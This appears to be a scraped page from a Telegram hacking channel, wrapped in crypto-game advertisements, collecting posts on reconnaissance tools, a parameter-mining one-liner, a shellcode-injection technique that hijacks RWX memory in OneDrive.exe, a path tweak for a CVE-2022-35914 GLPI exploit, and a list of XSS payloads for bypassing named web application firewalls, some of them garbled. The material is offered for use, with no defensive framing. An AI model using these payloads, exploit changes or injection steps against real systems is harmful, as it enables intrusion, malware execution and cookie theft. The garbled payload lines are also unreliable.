Community chat: https://t.me/hamster_kombat_chat_2
Twitter: x.com/hamster_kombat
YouTube: https://www.youtube.com/@HamsterKombat_Official
Bot: https://t.me/hamster_kombat_bot
Game: https://t.me/hamster_kombat_bot/
Last updated 4 months ago
Your easy, fun crypto trading app for buying and trading any crypto on the market.
📱 App: @Blum
🆘 Help: @BlumSupport
ℹ️ Chat: @BlumCrypto_Chat
Last updated 3 months, 3 weeks ago
Turn your endless taps into a financial tool.
Join @tapswap_bot
Collaboration - @taping_Guru
Last updated 6 days, 1 hour ago
ایردراپ جدید Seed با تفاوت اینکه کلیکی نیست بر مبنای زمانه ، فقط هر چند ساعت بیاید داخلش claim کنید ?
? paramspider ?
?
paramspider allows you to fetch URLs related to any domain or a list of domains from Wayback achives. It filters out "boring" URLs, allowing you to focus on the ones that matter the most.
*? *Installation:
cd paramspider
pip install .
*? *Usage:
paramspider \-d example.com
*? *Examples:
⚪️ Discover URLs for a single domain:
paramspider \-d example.com
⚪️ Discover URLs for multiple domains from a file:
paramspider \-l domains.txt
⚪️ Stream URLs on the termial:
paramspider \-d example.com \-s
⚪️ Set up web request proxy:
paramspider \-d example.com \-\-proxy '127.0.0.1:7890'
⚪️ Adding a placeholder for URL parameter values (default: "FUZZ"):
paramspider \-d example.com \-p '"><h1>reflection</h1>'
? Github
⬇️ Download
? A3l3_KA4
#osint #fuzzing #BugBounty
➖➖➖➖➖➖➖➖➖➖
? T.me/BugCod3
? T.me/A3l3_KA4
Param Mining
echo "target" | gau | sort \-u | xargs \-P 1 \-I {} sh \-c 'echo "param mining => {}" && arjun \-u "{}" \-m HEADERS' echo "target" | gau | sort \-u | xargs \-P 1 \-I {} sh \-c 'echo "param mining => {}" && arjun \-u "{}" \-m POST'
#Mine #Param #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
? T.me/BugCod3
? T.me/A3l3_KA4
RWX_MEMEORY_HUNT_AND_INJECTION_DV
?
Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling CreateRemoteThread, NtCreateRemoteThread or Direct calls.
*? *Usage:
Just compile the program and run the (EXE) without any paremeter.
*? *Steps:
⚪️ Find the OneDrive.exe in running processes.
⚪️ Get the handle of OneDrive.exe.
⚪️ Query remote process memory information.
⚪️ look for RWX memory regions.
⚪️ Write shellcode into found region of OneDrive.exe
⚪️ Fork OneDrive.exe into a new process.
⚪️ Set the forked process's start address to the cloned shellcode.
⚪️ Terminate the cloned process after execution
▶ DEMO
? Github
⬇️ Download
? A3l3_KA4
#ShellCode #Malware
➖➖➖➖➖➖➖➖➖➖
? T.me/BugCod3
? T.me/LearnExploit
? T.me/A3l3_KA4
CVE-2022-35914 - GLPI htmlawed
تو قسمت فایل پایتون این رو مد نظر بگیرین
def exploit(url,cmd,user_agent,check,hook):
uri = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
یکی از بچه ها تبدیلش کرده به :
def exploit(url,cmd,user_agent,check,hook):
uri = "/htmLawedTest.php"
Ilya ely ?
#Exploit #Cve
——————
@A3l3_KA4 ?
Mayfly
GLPI htmlawed (CVE-2022-35914)
Yes another pentester blog..
XSS WAF BYPASS PAYLOADS ?
Akamai WAf:
';k='e'%0Atop'al'+k+'rt'//
'">'ale'%2B'rt'>
CloudFlare WAf:
1337>
klzzwxh:00080000000040document.cookie)>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
X55.is OnLoad%0C=import(Src)>
Cloudfront Waf:
">'>
Mod security:
Imperva Waf:
X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//
Omnisci3nt
Omnisci3nt equips users with a comprehensive toolkit for conducting web reconnaissance with precision and efficiency.
?
Omnisci3nt is a powerful web reconnaissance tool designed to unravel the concealed intricacies of the online realm. With a comprehensive array of capabilities, Omnisci3nt offers users the means to delve into various aspects of a target domain, including IP lookup, domain information, SSL certificate details, DNS enumeration, subdomain enumeration, port scanning, web crawling, analysis of technologies utilized, Wayback Machine exploration, DMARC record examination, social media link discovery, and more.
Whether you're a cybersecurity professional, researcher, or individual seeking to gain insights into a particular domain, Omnisci3nt's versatile toolkit offers a comprehensive solution for navigating the intricate landscape of the web.
*? *Installation:
cd omnisci3nt
pip3 install \-r requirements.txt
python3 omnisci3nt.py
? Github
⬇️ Download
? A3l3_KA4
#Osint #Whois #Pentest #Tools
➖➖➖➖➖➖➖➖➖➖
? T.me/BugCod3
? T.me/A3l3_KA4
Community chat: https://t.me/hamster_kombat_chat_2
Twitter: x.com/hamster_kombat
YouTube: https://www.youtube.com/@HamsterKombat_Official
Bot: https://t.me/hamster_kombat_bot
Game: https://t.me/hamster_kombat_bot/
Last updated 4 months ago
Your easy, fun crypto trading app for buying and trading any crypto on the market.
📱 App: @Blum
🆘 Help: @BlumSupport
ℹ️ Chat: @BlumCrypto_Chat
Last updated 3 months, 3 weeks ago
Turn your endless taps into a financial tool.
Join @tapswap_bot
Collaboration - @taping_Guru
Last updated 6 days, 1 hour ago